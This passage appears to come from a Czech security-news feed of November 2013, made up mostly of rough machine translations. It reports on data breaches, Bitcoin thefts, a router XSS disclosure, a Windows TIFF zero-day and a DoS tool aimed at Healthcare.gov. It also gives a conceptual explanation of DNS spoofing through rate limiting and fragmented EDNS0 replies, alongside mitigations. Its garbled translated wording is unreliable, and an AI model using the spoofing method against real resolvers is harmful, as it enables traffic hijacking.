ovlivňuje Chrome a další zranitelnost Chrome, která vyústila v plné sandbox útěku, "sdílené Goudey. "Důsledky této chyby zabezpečení je možnost vzdálené spuštění kódu v postiženém zařízení." Stejně jako v předchozích prokázaných útoků, uživatelé jsou nutné kliknout na nebezpečný odkaz v objednávce útoku uspět. Podle nastavených cen , PinkiePie jede domů s 50.000 dolarů v kapse. Jak jsou definovány v pravidlech, společnosti stojí za ohrožené prohlížečů, operačních systémů a zařízení obdrželi informace o vykořisťovaných zranitelnosti, a doufejme, že oprava je rychle.


MacRumors fóra hacknut, 860k uživatelská hesla ohrožena

16.11.2013 Kriminalita | Hacking

Populární MacRumors uživatelské fórum utrpěl porušení a poradenství celistvost své 860000-silnou uživatelskou základnu, změnit svá hesla co nejdříve. hack bylo uskutečněno v pondělí a podle vlastníka webu Arnold Kim, oni okamžitě začala vyšetřovat útok s pomocí třetí strany výzkumníka zabezpečení.

Poznamenal, že hackeři kopírovat postup používaný útočníků, kterým se podařilo ohrozit Ubuntu fóra zpět v červenci: podařilo se dostat své ruce na účet pověřovacích listin moderátor a byli schopni vystupňovat své oprávnění pro přístup k heslo databáze. Jak se dostali moderátora pověření účtu na prvním místě je stále neznámý. Kim řekl, Ars Technica , že tak daleko, důkazy ukazují směrem neúspěšném pokusu o přístup k databázi. Nicméně, "věříme, že alespoň některé informace pro uživatele byly získány během útoku," řekl řekl . "V situacích, jako je tato, je to nejlepší, předpokládají, že MacRumors Přihlaš se uživatelským, e-mailovou adresu a (hash) Heslo je nyní znám." Radí uživatelům měnit svá hesla na místě je fór a okamžitě udělat to samé na jiném účtu pro které se používají stejné heslo. "Existuje několik průvodců pro on-line, jak si vybrat dobrého hesla," poznamenal a doporučuje uživatelům používat různá hesla pro každou službu a používat správce hesel software pro jejich správu.


Adobe špatné heslo bezpečnostní síly Facebook blokovat účty

16.11.2013 Hacking | Zabezpečení

Nedávná Guinness-world-rekord-velké porušení u Adobe se chystá způsobit mnoho problémů u uživatelů, jejichž přihlašovací údaje byla ohrožena. To by neměl být tak velký problém, pokud o ukradené informace byly dostatečně chráněny, ale ukázalo se, Adobe odvedl velmi špatnou práci při získávání údajů. Za prvé, byly všechny hesla zašifrována se stejným šifrovacím algoritmu (pravděpodobně DES nebo Triple DES), což znamená, že každý, kdo se dostane své ruce nebo postavy z dešifrovací klíč lze snadno dešifrovat všechny hesla. Pak, oni používají elektronický kód Book (ECB) metodu šifrování, která dělá všechny identické hesla vypadat stejné, když šifrována -., a všichni víme, že mnoho uživatelů používat stejné jednoduché a předvídatelné hesla třetí, databáze obsahovala (nešifrované) rady pro hesel, který dělal to triviální hádat hesla, které byly použity znovu a znovu (xkcd je vysvětlit to všechno nádherně.) nejhorší na tom je, že mnoho uživatelů si vybral stejné heslo jako ten, který používají pro své internetové bankovnictví nebo jejich Facebook účet, a často řekl , aby výslovně v "nápovědu", který šel spolu s . že Facebook již přestěhovala na ochranu svých uživatelů, kteří dělali to blokováním jejich účtů a jejich prezentaci s následující oznámení:

Ty jsou pak nuceni odpovědět na několik bezpečnostních otázek prokázat svou totožnost jako právoplatný vlastník účtu a změnit své heslo k složitějšímu a jedinečná. Čas ukáže, zda Facebook je jediná společnost, která zvažovala dopady aplikace Adobe porušení a přesunout je minimalizovat - doufejme, že tomu tak není. Mezitím alespoň jeden Adobe zákazník podal , co by se mohla stát Skupinová žaloba proti společnosti, tvrdí, že i přes slibné používají "přiměřenou správní, technické a fyzické bezpečnostní kontroly "k ochraně jejich PII a" špičkové bezpečnostní praktiky ", jejich skutečné bezpečnostní postupy jsou" nestandardní "a" pokračoval vést k porušování. " , zatímco přemýšlel o tom, zda se připojit k obleku nebo ne, mohou uživatelé aplikace Adobe zkontrolovat, zda jejich přihlašovací údaje byly ohroženy hack zadáním své e-mailové adresy v tomto místě / kontrola funkce .


Přes 376k kreditních karet ohrožení v rozporu LoyaltyBuild

16.11.2013 Kriminalita | Hacking

Irsko-založené marketingová společnost LoyaltyBuild utrpěl porušení, která vyústila v kompromis plných karet detailů než 376.000 zákazníků, a jméno, adresa, telefonní číslo a e-mailová adresa 1.120.000 zákazníků, Úřad pro ochranu Irska údajů komisaře ukázala na veřejnosti.

"Počáteční nasvědčuje tomu, že tato porušení byly externí trestný čin," oni si všimli. "ODPC posoudí plně závěry kontroly a bude dělat řadu doporučení Loyaltybuild. Následné kontroly bude rovněž provedeno. " LoyaltyBuild spolupracuje s podniky vytvářet, spravovat a dodávat zákaznické věrnostní programy, a mezi těmi, kteří měli své údaje o platební kartě ukradl bylo více než 70.000 zákazníků Getaway supermarketů Supervalu je přestávky programu, a více než 8000 zákazníků který se podílí na odměny pro volný čas Přestávka programu pojišťovny AXA. Obě výše uvedené společnosti dočasně umístit programů " rezervační stránky v režimu offline, a radil někoho, kdo rezervovaný Getaway / AXA volný čas zlomu nedávno "přezkoumat své účty a o každém nezvyklém činnost nebo nevyžádaných sdělení vztahující se k této otázce na jejich finanční instituci. "Oba také zmínil, že jejich další webové stránky nebo jiné zákaznické transakce platební kartou byly ovlivněny porušením, a začali vysílat oznámení o porušení, aby ovlivnila zákazníků. LoyaltyBuild uvedla, že narušení systému byl objeven minulý měsíc, a že pracují nepřetržitě s jejich bezpečnostních expertů se dostat až na dno věci. "Od chvíle, kdy jsme se poprvé zjistil podezření na porušení bezpečnosti na pátek říjnu 25. Okamžitě jsme využili jejich služeb, s bezpečnostní expert forenzní tým a pracovali neúnavně snažit tuto situaci napravit, "oni poznamenal . "DPC a Gardai bude průběžně informován o dalším vývoji." Irish Examiner reportér Mike Harris předpokládá , že vzhledem k tomu, že napadené data byla historická (shromážděny v období mezi lednem 2011 a únorem 2012), zdá se, že to nebylo " t sedí na hlavním systému kreditních karet, ale byl pravděpodobně dumpingové mimo chráněné databáze zaměstnancem neznámých důvodů. LoyaltyBuild se doposud odmítl sdílet více informací o tom, jak porušení a data exfiltrace stalo. Uživatelé, kteří se jejich karty ukradené údaje udělá dobře kontrolovat své účty a dohlížet na jejich bankovních výpisů v dohledné budoucnosti. Hackeři ukradli všechny informace potřebné ke klonování kreditních karet a využít je k nákupům, ale je také možné, že tyto informace budou prodány jiným zločincům, a používal měsíců od této chvíle. Je také možné, že se budou snažit vydávat LoyaltyBuild prostřednictvím e-mailu, aby dotčení uživatelé sdílejí další citlivá data.


Českou burzu Bitcash napadli hackeři a ukradli všechny bitcoiny

12.11.2013 Kriminalita | Hacking
Hackerům se podařilo v pondělí prolomit zabezpečení české burzy Bitcash.cz, která prostřednictvím svých internetových stránek provozovala peněženky s virtuální měnou bitcoin, a odcizit všechny prostředky. Bitcash to uvedl na svých stránkách.
O bitcoinech

Na bitcoinu je založena řada legálních investičních fondů a obchoduje se s ním na specializovaných burzách. Měnu již také přijímají některé obchody. Bitcoin vytvořil v roce 2009 anonymní vývojář používající pseudonym Satoši Nakamoto. Je navržen tak, aby ho nikdo nemohl jakkoli ovlivňovat, tedy ani vlády a centrální banky.
Ještě zhruba v polovině loňského roku stál jeden bitcoin pouhých sedm dolarů. Začátkem letošního roku zaznamenala měna silný růst, později se však vývoj jejího kurzu dočasně obrátil kvůli technickým problémům při obchodování.
„Dne 11. listopadu ve večerních hodinách bylo prolomeno zabezpečení serveru. Bohužel, noční můra se stala skutečností. Řešíme způsob útoku, zabezpečení a co můžeme dál podniknout,“ píše se na webu Bitcash.cz.

Kdo za útokem stojí, se zatím nepodařilo zjistit. „Momentálně podáváme trestní oznámení na neznámého pachatele,“ konstatovali tvůrci webu.

Podle serveru E15.cz česká burza Bitcash v minulosti spravovala zhruba čtyři tisíce virtuálních peněženek a bitcoiny v hodnotě za více než dva milióny korun. Hodnota kybernetické měny bitcoin se počátkem tohoto měsíce vyšplhala na nové rekordní maximum kolem 251 dolarů (zhruba 5000 Kč).

Nájezdy na bitcoinové peněženky nejsou ojedinělé
Nájezdy kybernetických pirátů na bitcoinové systémy nejsou vůbec ojedinělé. Na konci října se jim například podařilo odcizit z britské internetové peněženky inputs.io bitcoiny v celkové hodnotě přes 26 miliónů korun.

„Zatímco v běžné bance by byly vklady ze zákona pojištěné, v tomto případě pravděpodobně všichni střadatelé o své peníze jednoduše přišli a záleží pouze na nich a provozovateli, jak se k celé věci postaví,“ podotkl Jakub Čížek ze serveru Živě.cz.


Fake LinkedIn profil setkání informace pro cílené útoky

11.11.2013 Hacking | Kriminalita

Sociální sítě jsou velkým zdrojem informací pro počítačové zločince a skvělý způsob, jak vstoupit do kruhu potenciálních obětí důvěry. Probíhající sociální inženýrství zaměřenou na cílovou skupinu uživatelů LinkedIn byl pomocí "profesionální" sociální síť popularizovat konkrétní seznamka, ale podle Websense pro výzkumníky, konečným cílem kampaně je pravděpodobné, zlověstnější. útočníci vytvořili falešnou LinkedIn účet pod jménem Jessica Reinsch, která má v současné době více než 400 spojení, a je používán i pro zobrazení profilů potenciálních cílů a vést je, aby výše uvedené seznamka ("Pro mladší dámy a pánové zralé"):

"Funkce vyhledávání v rámci sociální sítě poskytují snadný způsob pro podvodníky a oprávněných uživatelů LinkedIn pro zvětšení na jejich cílové publikum," výzkumníci poukazují . "Ať už jste náborář hledá potenciální kandidáty, seznamka podvodník hledali" zralé gentlemanů ", nebo pokročilé Útočník hledá vysoce postavených ředitelů v rámci jednotlivých průmyslových odvětví, LinkedIn uživatelé mají přístup k nástrojům, které vám vylepšit své hledání." V Aby bylo možné udělat efektivněji, podvodníci se ujistit, aby dotyčný účet premium účet, který jim umožňuje vyhledávat uživatelům na základě jejich pracovní funkci, seniority úrovni a velikosti podniku - všechny informace, které mohou přijít vhod pro budoucí sociální inženýrství útoky. "Všimněte si, že funkce Premium konto také napomoci větší míru interakce s cíli. Pokud cíl zobrazit profil podvod, může podvodník pak vidět, že pro všechna zobrazení. Podvodník může se také obrátit na kteréhokoliv člena LinkedIn a prohledávat větší množství profilů, "výzkumníci přidat. Výzkumní pracovníci se domnívají, že podvodníci používají seznamka jako návnada. Poukázali na to, že místo nemá v současné době sportovat škodlivého kódu, ale jeho IP adresa byla dříve spojena s oblastí, které se, stejně jako na číslo autonomního systému (ASN), že v jednom okamžiku, který je součástí C & C URL pro počet Exploit sad. To vše nasvědčuje tomu, že kampaň je daleko od neškodný, a že to je pravděpodobně jen se zlými úmysly Scheme "průzkum" fáze. Jen v případě, že badatelé profil na LinkedIn.


D-Link Router ohrožená Cross-Site Scripting
11.11.2013 Hacking | Zranitelnosti

D-Link DSL-2760N (2760U-BN) routery údajně obsahují řadu uložených a reflexní cross-site scripting (XSS zranitelnosti).

Výzkumník Liad Mizrachi řekl, že kontaktoval D-Link zveřejnit podrobnosti o chybách, které jim ze šesti různých příležitostech - dvakrát v srpnu, dvakrát v září a poté v říjnu - ale to, že prodejce nereagoval na žádné z odhalení. Threatpost natáhl D-Link k připomínkám, ale neodpověděl na žádost před zveřejněním.

Rozmanité chyby jsou přítomny v různých částech routeru Web uživatelského rozhraní.

Podle umístění na Plný seznam zpřístupnění Poštovní , se 2760N routeru XSS chyby existují v nastavení NTS, rodičovskou kontrolu, filtrování URL adres, NAT spouštěč portu, IP filtrování, rozhraní seskupení, jednoduché síťové řídící protokol, vstupní filtr IP policy routing, tiskový server, SAMBA konfigurace a Wi-Fi SSID webové rozhraní, resp.

Tyto chyby postupujte závažnější zranitelnost backdoor, který se objevil minulý měsíc a mohl dát útočník možnost přístupu k postiženým směrovače a provádět žádnou akci mu zlíbilo. D-Link je údajně v procesu záplatování této chybě.


Bitcoin výzkumník říká, že je "hloupost" Ignorovat nový útok
9.11.2013 Hacking | Počítačový útok | Kriminalita

Autor článku, který popisuje nový útok na Bitcoin protokol říká, že kritika článku jsou zavádějící a že existují vážné problémy s Bitcoin, které je třeba řešit.

Ermin Gun Sirer, profesor na Cornellově univerzitě, publikoval článek minulý týden spolu s jeho spoluautor Ittay Eyal, av něm vědci popisují útok, ve které bazén horníků Bitcoin by vytěžit své vlastní bloky a udržet je v tajnosti a pouze publikovat své řetěz, když je delší než jeden veřejný, které tvoří jejich autoritativní člověk. Tento tzv. "sobecký" těžební situace by pak teoreticky sněhová koule a přilákat více horníků do bazénu v naději na získání další odměny.

Kritici říkají, že práce se opírá o chybném předpokladu, že horníci by se jednat v nejlepším zájmu tohoto nového "sobeckého" těžební skupiny, spíše než v jejich vlastním zájmu, což by mohlo vést k jejich poskakování tam a zpět mezi sobeckým těžební skupiny a hlavní bazén horníků. Jiní, včetně vedoucího vývojáře Bitcoin, bagatelizoval útok s tím, že to není hlavní problém v reálném světě.

"Velmi časté reakce na bezpečnostní chyby je pro oddaných stoupenců, aby se minimalizovalo problém. Připomínky, které jsem viděl z rozumní lidé uznávají, že se jedná o závažný problém, ale že útok pravděpodobně nebude mít úspěch přes noc, a proto tam bude čas na oblast lidských měřítek, reagovat na problém. Doufáme, a podezření, že je to pravda, protože chceme Bitcoin být životaschopná měna, "řekl Sirer e-mailem.

"Ale to by bylo pošetilé ignorovat problém, nebo se spolehnout na manuální zásah jednat s automatických, mechanických útoku. Distribuované systémy jsou robustní, do té míry, že jejich silné a slabé stránky jsou dobře popsány. A Bitcoin silných byly nadhodnocené do našich zjištění.

"A měnové systémy jsou robustní, do té míry, že poskytují správné peněžní pobídky účastníků. V současné době Bitcoin se zdá být v území, kde je to spoléhat na laskavost cizích lidí. "

Myšlenka skupiny horníků získává dostatek energie, aby se nad systémem Bitcoin není nová, ale útok navržena sirer a Eyal závisí na mnohem menší bazén horníků splnit úkol, jedna třetina všech uživatelů . Je-li takový útok se stalo, nebo se pokračuje se v této věci, snaží se zjistit, kdo tito horníci by se mohla stát jednou z priorit. Sirer řekl, že je jasné, zda je to možné právě teď.

"Selfish horníci mohou mít sítě podpis, kde se zdá, že nabízejí bloky souběžně s ostatními. A pokud členství v sobecké bazénu je otevřen všem, mohou být infiltrovány. Avšak v každé opatření, jsou protiopatření. Například by mohly být sobecké horníci schovávat za jedno použití adres, které omezují množství informací, které odhalí účastníkům, atd. Identifikace sobecké horníků a vyškrtávali je ze sítě je nepravděpodobné, že bude snadné, "řekl Sirer.


Útočníci Zvedněte $ 1.2M z Bitcoin Wallet služby
8.11.2013 Hacking | Kriminalita

Další problém pro Bitcoin tento týden po australském kontě služby připustil, že útočníci se vloupali do jejich systémů a utekl s více než 1.200.000 dolarů v hodnotě z digitálního crypto-měně.

Krádež je na frak od sporných výzkumné zprávě tvrdí, že menší než původně myslel-koalice horníků Bitcoin mohl splynout dohromady, aby vytvořily monopol na vytváření bloků na knihy Bitcoin je.

Bitcoin horníci mají za úkol vytvářet nové kryptografické moduly pro blok řetězce, hlavní knihy, na kterých je uvedeno každé veřejné Bitcoin transakce. Každý nový blok musí odrážet informace o transakci z bývalého bloku. Tak, každý blok musí obsahovat v sobě záznam každého oprávněného Bitcoin transakce vůbec provádět. V daném okamžiku je jedna směrodatná Bitcoin blok řetězce. Pokud uživatel nebo skupina uživatelů, vytváří delší blok řetězce - stejně jako v, jeden, který odráží více transakcí, než ten před ním - a pak, že řetěz se stává autoritativní člověk. Generátory nových bloků jsou uděleny nové Bitcoiny protože úkol, který se rovná vyřešení neuvěřitelně obtížný matematický problém, vyžaduje obrovské množství výpočetního výkonu.

Bitcoin peněženka služby jsou jen místa, kde mohou uživatelé ukládat své Bitcoiny.

Inputs.io nabízený sebe jako nejbezpečnější Bitcoin peněženky k dispozici. Ale zpráva Inputs.io přispíval v místě svých internetových stránkách uvádí, že útočníci ohrožena službu dvakrát, takže pryč s 4100 Bitcoiny.

"Dva hacky celkové (sic), asi 4100 BTC zbývá Inputs.io schopen zaplatit všechny uživatelské bilance," píše zpráva. "Útočník ohrožena hosting účet prostřednictvím kompromitujících e-mailových účtů (některé velmi staré a bez připojených telefonních čísel, takže to bylo snadné reset). Útočník se podařilo obejít 2fa kvůli vadou na straně serveru hostitele. "

Na fóru s názvem Bitcointalk uživatel, působící pod rukojetí TradeFortress, údajně majitel inputs.io, tvrdí, že se snaží vydávat částečné náhrady osobám, které ztratily peníze kvůli hack, ale že nemá dostatek vlastních osobně Bitcoiny plně nahradit veškeré ztráty. On také vypadá, že se naučili klíčovou lekci, která nabízí následující rady všem na fóru:

"Nedoporučuji ukládáním Bitcoiny dostupné na počítačích připojených k internetu."


otec-dcera Hacking Team Najde hodnotné Facebook Bug
8.11.2013 Hacking | Kriminalita

Wysopal jméno bylo na zranitelnosti rad na lepší než 20 let, a to nevypadá, že skončí v dohledné době. Ale jméno na těch rad v budoucnu může být Renee než Chris Wysopal .

Chris, jeden ze zakládajících členů L0pht hacking kolektivní a nyní ČTÚ a CISO na Veracode, pomáhal formovat tak, že chyby byly oznámeny dodavateli a zveřejněny pro uživatele a je součástí některých úsilí celé odvětví definovat zveřejnění pokyny a dodavatelů odpovědi. Zatímco na @ sázce Wyspoal a zbytek výzkumného týmu byli v čele hnutí, která se snažila tlačit dodavatele do úzce a upřímně bezpečnostních výzkumníků, kteří zveřejněných chyby k nim.

Nyní jeho dcera Renee se po jeho stopách. Během letní stáže v Veracode, Renee, druháku na Trinity College v Hartfordu, Connecticut zúčastnil společnosti výroční hackathon, den-dlouhá událost, ve které jsou všichni zaměstnanci povzbuzováni k účasti a pracovat na hacking projektu. Renee, který pracoval v oddělení lidských zdrojů, se rozhodl pracovat se svým otcem na projektu najít chybu, která by se kvalifikovaly na bug bounty na Facebooku.

"Já viděl na Twitteru, že Facebook bude platit odměnu, tak jsem okamžitě něco dělat se svým otcem, a on řekl, že bychom měli udělat to společně, protože jsem ve škole a Facebook je velmi rozšířená v mé věkové skupině, a můj táta je hacker, takže jsme si mysleli, že by bylo zábavné, aby to dohromady, "řekla.

Vzhledem k tomu, Renee bezpečnostní nováček, začali od začátku. Chris začal tím, že ukazuje jí, co by udělal pro řešení webové aplikace, jako je Facebook.

"Začal jsem tím, že ukazuje jí, jak používat webový server proxy a zobrazit zdroj a upravit různé parametry mimo webové rozhraní, takže si mohl zaútočit na webové aplikace," řekl Chris. "Takže odešla začal přemýšlet o tom, kde by mohla být chyba a ona se přiklonil k jednomu z chlupatější částí Facebook, který je soukromí a povolení modelu."

Takže Renee začal šťourat se Facebook aplikace a během několika dnů se začala soustředit na funkci, která umožňuje uživatelům blokovat ostatním uživatelům ze svých stránek. Je to velmi používaná soukromí funkce a myšlenka je umožnit uživatelům, aby lidé už nejsou zájem o interakci s byla schopna posílat zprávy o jejich profilů. Renee si všiml, že tam bylo spoustu zpráv na její straně od někoho, ona blokován nějakým časem.

"Myslel jsem, že tam musí být nějaký druh slabosti tam," řekla, "když Facebook stále dovolit jí, aby její jméno po celém mém profilu. Myslím, že jsem na to přišel další den. Četl jsem všechno o klobouk Facebook bílé programu a žádají použít testovací účty. Použil jsem testovací účet, takže jakmile to fungovalo byl jsem nadšený, ale já myslel, že to byla jen chyba v testovací účet. "

Ona pak zkouší to na kamaráda účet a zjistili jsme, že to ještě funguje. Po zablokování sama na své kamarádky účtu, když byl ještě schopný se dostat zprávy přes její kamarádky účtu. Takže s pomocí svého otce, Renee sepsal zranitelnosti zprávu a předložila jej k chybě Facebooku nájemný programu v srpnu. Ve chvíli, kdy našel chybu, zkouší to a předložila zprávu, Veracode hackathon byl téměř u konce a je čas na Renee a Chris dodávat svou zprávu o tom, co jsme dosáhli. Ale ještě neměl odpověď od Facebooku na tom, zda je chyba kvalifikaci pro odměnu.

"Bylo to zklamání, protože jsme museli dát zprávu a my jsme nedostali odpověď Ještě ne," řekla Renée. "Všichni bychom mohli říci, bylo, jsme podali tuto zprávu. V určitém okamžiku řekli, dostaneme se zpět k vám později. "

Později se ukázalo být více než dva měsíce, ale když přišla odpověď, je to dobrá zpráva: Renee si vysloužil jí 2500dolar odměnu z Facebooku.

"Bylo to určitě překvapení. Vrátil jsem se do školy a nějak na to zapomněl a právě zaměřen na školy, "řekla. "Rozhodně jsem myslel, že jsem neměl v úmyslu nic najít, ale jsem si můj táta."

Renee, který není prohlášen za hlavní, ale zatím se naklání směrem k politické vědě, řekla, že opravdu neměl mít dobrou představu o tom, co její otec udělal, když byla mladší.

"Vždycky jsem si vzpomenout, že je stále ve své domácí kanceláři na svém počítači psaní podivné znaky. I když mi bylo šest nebo sedm, tak bych se zeptat, co dělá, a že bych byl hacking. Neměl jsem tušení, co to bylo, "řekla. "Pravděpodobně to byl teprve v posledních několika letech, že jsem si uvědomil, jak cool věci udělal, bylo, po přečtení jeho wikipedie. Je to docela skromný o tom. "

Takže má její vpád do hackerské ji prodal na následující její otec dráhu?

"Pro tuto chvíli si myslím, že je to jeden a hotovo typ věc, protože je to tak frustrující proces. V některých ohledech mám pocit, že jsem štěstí najít to, "řekla.


Healthcare.gov Denial-of-Service Tool nevedou k úspěchu

7.11.2013 Hacking | Kriminalita

Arbor Networks Security Engineering a Response Team (asert) objevil denial-of-service nástroj speciálně zaměřit vlády USA zdravotní zápisu tržiště, Healthcare.gov.

Healthcare.gov je stanovena cenově dostupnou péči zákon (ACA) ve Spojených státech, možná lépe známý neologismem "Obamacare." ACA je zvažován mnoho být amerického prezidenta Baracka Obamy koruna úspěch, jehož cílem je zajistit zdravotní pojištění pro miliony nepojištěných Američanů. Rollout webové stránky, které podporuje ACA byl kazen zdánlivě nekonečné a ponižující řadu technických problémů.

Jak přesto, asert nemá žádné informace o tom, že některý z výpadku zažil na Healthcare.gov je výsledek, pokud DoS nebo distribuované odmítnutí služby (DDoS) útok.

Nicméně, nástroj DoS, napsaná převážně v programovacím jazyce Delphi, se objevil, a jeho jediný cíl je posílá zdravotní výměnu offline. Nástroj údajně provádí vrstvu sedm žádostí se dostanete na webové stránky, střídavě healthcare.gov a ten samý webové stránky "Kontaktujte nás" stránce.

ObamaCare_screenShot

Naštěstí pro mnoho zastánců ACA již v rozpacích Exchange problematických začátků, asert tvrdí, že nástroj je nepravděpodobné, že uspět ve svých pokusů dělat Healthcare.gov nedostupný, protože jeho non-distribuované architektury a další limitující faktory.

Podle zprávy, aplikace je k dispozici ke stažení z několika zdrojů a je distribuován na sociálních sítích médií stejně.

"Asert nemá informace o účinné používání tohoto softwaru," Arbor Network Marc EISENBARTHOVÁ psal o asert blogu . "Asert viděl site-specific popření servisních nástrojů v minulosti v souvislosti s tématy společenského a politického zájmu. Tato aplikace pokračuje trend asert je vidět na popření servisních útoků se používá jako prostředek odplaty proti politice, právních rozsudků nebo vládních opatření. "


Microsoft varuje před útoky kyberzločinců

7.11.2013 Bezpečnost | Hacking | Počítačový útok
Internetoví útočníci by podle Microsoftu mohli zneužít zranitelnosti v operačním systému Windows k získání kontroly nad uživatelskými počítači.

Pro získání přístupu do uživatelského zařízení by podle společnosti stačilo, aby si oběť zobrazila nebo otevřela speciálně upravený e-mail či webový obsah.

Problém se týká operačních systémů Windows Vista, Windows Server 2008, a produktů Microsoft Office 2003 – 2010 a Microsoft Lync. Uživatelé novějších verzí zmíněných produktů tak mohou zůstat v klidu.

Chyba, kterou by útočníci mohli potenciálně zneužít, se nachází v grafické komponentě. Kompletní a podrobný seznam všech ohrožených programů je na oficiálních stránkách Microsoftu.

Microsoft prý již pracuje na odstranění zranitelnosti. Pravděpodobným řešením je prý zahrnutí potřebné opravy do měsíčních aktualizací nebo vydání bezpečnostní aktualizace mimo tento systém. Do té doby však společnost uživatelům radí, aby provedli takové úpravy v nastavení ohrožených produktů, které sice chybu zcela neeliminují, ale pomůžou zabránit případným útokům.

Chyba je podle Microsoftu ve způsobu, jakým grafické komponenty nakládají se soubory ve formátu TIFF (Tagged Image File Format). K zneužití této zranitelnosti je prý ale potřeba přimět oběť k provedení určitých kroků. V praxi to znamená, že by uživatelé neměli otevírat zprávy s podezřelými příponami, ani by si neměli zobrazovat jejich náhled.

Útok je teoreticky možné vést i prostřednictvím falešných webových stránek. Pokud by se operace zdařila, získal by útočník stejná práva k napadenému zařízení jako má jeho skutečný majitel.


Microsoft varuje před cílených útoků na Windows 0-Day
6.11.2013 Hacking | Počítačový útok | Zranitelnosti

Microsoft varuje uživatele o cílených útoků proti nové zranitelnosti v několika verzích Windows a Office, která by mohla útočníkovi umožnit převzít v počítači uživatele. Chyba, která ještě není oprava, je používán jako součást cílených útoků škodlivých e-mailových příloh, zejména na Středním východě av Asii.

V nepřítomnosti záplatou, Microsoft vydala fixit nástroj pro zranitelnosti, což zabraňuje zneužití proti zranitelnosti pracovat. Chyba ovlivňuje Windows Vista, Windows Server 2008 a Microsoft Office 2003 přes 2010.

"Exploit vyžaduje zásah uživatele, jako je útok se tváří jako e-mail žádající potenciálních cílů k otevření speciálně vytvořeného Word přílohu. Pokud je příloha otevření nebo náhledu, pokusí zneužít tuto chybu zabezpečení pomocí chybně grafiku vložené do dokumentu. Útočník, který by úspěšně zneužil tuto chybu zabezpečení, by mohl získat stejná uživatelská práva, jaká má přihlášený uživatel "Microsoft poradní říká.

Tato chyba zabezpečení nemá vliv na aktuální verze systému Windows, uvedla firma, a uživatelé, kteří používají potenciálně ohrožené produkty, může trvat několik opatření, aby se ochránili. Instalace fixit nástroj pomůže zabránit vykořisťování, jak bude nasazení Enhanced Mitigation Experience Toolkit (EMET), který pomáhá zmírnit využije proti některým tříd chyb.

"Tato chyba zabezpečení je vzdálené spuštění kódu, který existuje ve způsobu, jakým postižené součásti zvládnout speciálně vytvořené obrazy TIFF. Útočník by mohl zneužít tuto chybu zabezpečení tím, že by uživatele přesvědčil k náhledu nebo otevření speciálně vytvořenou e-mailovou zprávu, otevřete speciálně vytvořený soubor, nebo procházet speciálně vytvořený webový obsah. Útočník, který by úspěšně zneužil tuto chybu zabezpečení, by mohl získat stejná uživatelská práva, jako aktuálního uživatele. Uživatelé, jejichž účty jsou konfigurovány tak, aby měli méně uživatelských práv v systému, by byli vystaveni menšímu riziku než uživatelé s uživatelskými právy správce <'Microsoft úředníků řekl.


Nové triky, které mohou přinést DNS spoofing zpět, nebo: "Proč by měl umožnit DNSSEC i když je bolest dělat"

05.11.2013 Počítačový útok | Hacking

V poslední době, dva dokumenty independently nastínil nové útoky proti DNS, což podkopává některé z bezpečnostních prvků chránících nás falšování DNS.

Jak Dan Kaminsky ukázal [1], 16 bit ID dotazu jsou nedostatečná ochrana proti podvržení DNS. Jako výsledek, DNS servery začal náhodně zdrojový port DNS dotazů, aby DNS spoofing těžší. To nikdy neměla "opravit" DNS spoofing, ale fungoval dobře dost pro DNSSEC musí být odsunuto znovu.

Celkově se úspěšně spoof DNS, musí útočník překonat různé problémy:

odpovědět dříve, než přijde odpověď platí: To lze snadno provést začíná povodňových odpovědí ještě předtím, než byl poslán dotaz.
Hádej Query DNS ID a zdrojový port dotazu: V současné době je tento problém považován za hlavní kámen úrazu.
Jakmile je platný dotaz přijde, je útočník "uzamčen" z pokusu další pokus o falšování, dokud TTL záznamu vyprší (Dan Kaminsky ukázaly, jak to lze překonat tím, že žádá o neexistující záznamy)
Mezi další útoky používáte dvě modernější DNS vlastnosti:

Odpovědět Omezení rychlosti (RRL)

DNS spoofing není jediný problém DNS musíme bránit. DNS servery mohou být zneužity jako reflektory v odmítnutí útoků služby (DoS). I když DNS server je pouze zodpovídání dotazů, pro které je autoritativní, může ještě být zneužit tím, že žádá pro záznamy, pro které je směrodatné pro. Moderní DNS servery (např. BIND 9), kterou funkci pro omezení, kolik odpovědí DNS server bude odesílat. Pokud je dosaženo limitu, server DNS buď nereagují vůbec, nebo odpovědět s prázdným zkrácený odpověď. Prázdný zkrácen odpověď bude nutit zdroj dotazu vrátit přes TCP. Pokud dotaz spoofed, pak se to nestane. BIND ve výchozím nastavení přeskočí každý druhý odpověď v tomto scénáři.

Problém arrises pokud útočník zaplaví autoritativní DNS server, aby mu zabránil odeslání odpovědi. To poskytne více času posílat podvržené odpovědi zpět. Výzkumníci ukázali, že to může vést k podvržení DNS. Ale to vyžaduje hodně paketů (100 Mbit za 8 hodin), aby byla úspěšná jako Query ID a zdrojový port potřebuje být brute vynutit. [2]

Na obranu proti tomuto útoku, při zachování RRL, stačí upravit skluzu hodnotu, která určuje, jak často DNS server bude přeskakovat odpověď DNS, zatímco v nouzi. Skluzu hodnota "1" nevynechá žádné odpovědi.

Roztříštěné EDNS0 odpovědi

Původně byly DNS odpovědi omezena na 512 bajtů, aby se zabránilo fragmentaci. Jakékoliv větší reakce musela být požadováno přes TCP. Nicméně, TCP vyžaduje značné vyšší zatížení a dotaz musí být odeslána dvakrát. Moderní DNS tendenci používat větší odpovědi s IPv6 a DNSSEC záznamů, jakož i využívání DNS pro vyrovnávání zatížení. V reakci na to byl představen nový systém, který EDNS0,. Pokud je povoleno, může server DNS signalizovat maximální odezvy velikost, která je větší než 512 bajtů. Typická hodnota je 4096 bajtů. V důsledku toho, jsou tyto reakce často roztříštěné.

Je-li odpověď roztříštěné, všechny hodnoty použité pro "ověření" odpověď je v prvním fragmentu (dotaz id a UDP porty). Nyní je možné, aby útočník spoof další fragmenty. Všechny útočník uhodnout je fragment offset a fragment ID. Offset fragment je možné odhadnout, že za předpokladu, MTU je 1500 bajtů (nebo může být odvozeno z MSS-li paket TCP ze serveru DNS obdrží útočníkem). Fragment ID (nebo IP ID) je často zvýšen z paketu paket, takže jej lze snadno uhodnout. Je-li náhodné, je stále jen 16 bitů dlouhá. [3]

Neexistuje žádný slušný obranou proti útoku dosud. Zakázání EDNS0 může fungovat, ale bude to vést k problémům s DNSSEC, která vyžaduje EDNS0. Váš operační systém může umožnit náhodně dotazu ID a to by pravděpodobně minimální ochrana pro teď.

DNSSEC samozřejmě zůstává jedinou skutečnou ochranou proti těmto útokům.

[1] http://dankaminsky.com/2008/07/24/details/
[2]
http://u.cs.biu.ac.il/ ~ herzbea/security/13-03-frag.pdf


Internet široký DNS skenování

05.11.2013 Hacking | Počítačový útok

